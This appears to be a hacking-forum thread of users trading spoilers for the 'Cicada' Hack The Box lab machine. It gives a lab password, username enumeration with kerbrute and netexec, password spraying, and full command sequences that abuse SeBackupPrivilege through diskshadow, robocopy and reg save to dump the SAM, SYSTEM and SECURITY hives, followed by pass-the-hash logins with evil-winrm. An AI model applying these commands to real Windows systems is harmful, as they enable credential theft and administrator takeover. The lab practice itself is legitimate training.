[kevindragonfly]

for root  read
https://kb.offsec.nl/tools/techniques/ba...ratortoda/

ty guys for your research!

[sedlyf]

Easy User and Root

User :

`evil-winrm -i 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' `

Root :

`robocopy C:\Users\Administrator\Desktop C:\Users\Public root.txt /B`

`type C:\Users\Public\root.txt`

[local]

Which wordlist do you guys used for find usernames

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.

[hackemall]

cd into C:\Windows\temp and type this line by line

echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
echo "create" | out-file ./diskshadow.txt -encoding ascii -append
echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append


ls to make sure there is diskshadow.txt and run:

diskshadow.exe /s c:\Windows\temp\diskshadow.txt


Next:

robocopy /b Z:\Windows\System32\Config C:\Windows\temp SAM
robocopy /b Z:\Windows\System32\Config C:\Windows\temp SYSTEM

robocopy /b Z:\Windows\System32\Config C:\Windows\temp SECURITY


Download SAM, SYSTEM, and SECURITY


impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[hollb_geek]

kerbrute    Version: v1.0.3 (9dad6e1) - 09/28/24 - Ronnie Flathers @ropnop

2024/09/28 14:25:50 >  Using KDC(s):
2024/09/28 14:25:50 >      10.10.11.35:88

2024/09/28 14:25:51 >  [+] VALID USERNAME:    michael.wrightson@cicada.htb
2024/09/28 14:25:51 >  [+] VALID USERNAME:    sarah.dantelia@cicada.htb
2024/09/28 14:25:51 >  [+] VALID USERNAME:    john.smoulder@cicada.htb
2024/09/28 14:25:51 >  [+] VALID USERNAME:    emily.oscars@cicada.htb
2024/09/28 14:25:51 >  [+] VALID USERNAME:    david.orelious@cicada.htb
2024/09/28 14:25:51 >  Done! Tested 5 usernames (5 valid) in 0.073 seconds

Which command did you run?

kerbrute userenum --dc <IP> -d cicada.htb <PATH-TO-WORDLIST>

Which wordlist did you use ?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[Omerta]

impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL

evil-winrm -i (IP) -u Administrator -H 2b87e7................................

[asdasas2132122]

ROOT:

whoami /priv

SeBackupPrivilege | Back up files and directories | Enabled

cd /
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system

cd Temp
download sam
download system


pypykatz registry --sam sam system


evil-winrm -u "Administrator" -H "admin_hash" -i <ip>



more info: https://www.hackingarticles.in/windows-p...privilege/

[Art10n]

cd into C:\Windows\temp and type this line by line

echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
echo "create" | out-file ./diskshadow.txt -encoding ascii -append
echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append


ls to make sure there is diskshadow.txt and run:

diskshadow.exe /s c:\Windows\temp\diskshadow.txt


Next:

robocopy /b Z:\Windows\System32\Config C:\Windows\temp SAM
robocopy /b Z:\Windows\System32\Config C:\Windows\temp SYSTEM

robocopy /b Z:\Windows\System32\Config C:\Windows\temp SECURITY


Download SAM, SYSTEM, and SECURITY


impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL

This is the real escalation --> evil-winrm -i cicada.htb -u Administrator -H <HASH>

[hollb_geek]

The list of users is obtainable by using --rid-brute in crackmapexec/netexec.
Then you can use crackmapexec to passwordspray the password from the .txt.
From there you need to check the list of users using the set of credentials, you will find another set of credentials, from there you can check the shares again and obtain the last set of credentials.
From there you can obtain system by leveraging the group of that last user.

Thanks, I missed this useful post:

netexec smb $IP -u guest -p '' --rid-brute
netexec smb $IP -u guest -p '' --rid-brute > rid.txt
Save users to wordlist
cat rid.txt | grep SidTypeUser | awk '{print $6}' | awk -F\\ '{print $2}' > users-cicada.txt
Spraying the found password in the note from the HR :
netexec smb $IP -u users-cicada.txt -p 'Cicada*****'

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[hackemall]

─(kali㉿kali)-[~/Desktop]
└─$ smbclient //10.10.11.35/DEV -U david.orelious

Password for [WORKGROUP\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  D        0  Thu Mar 14 12:31:39 2024
  ..                                  D        0  Thu Mar 14 12:21:29 2024
  Backup_script.ps1                  A      601  Wed Aug 28 17:28:22 2024

                4168447 blocks of size 4096. 334899 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (6.2 KiloBytes/sec) (average 6.2 KiloBytes/sec)
smb: \> exit

no passwords work what u used>?

Default pass is in HR notes

---

The Backup Operators group in Windows has special privileges that allow its members to bypass file permissions to back up and restore files. Members of this group can read every file on the system, including files that only the SYSTEM or Administrator accounts have access to, like the SAM, SYSTEM, and SECURITY registry hives. These hives contain critical information, including hashed passwords.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.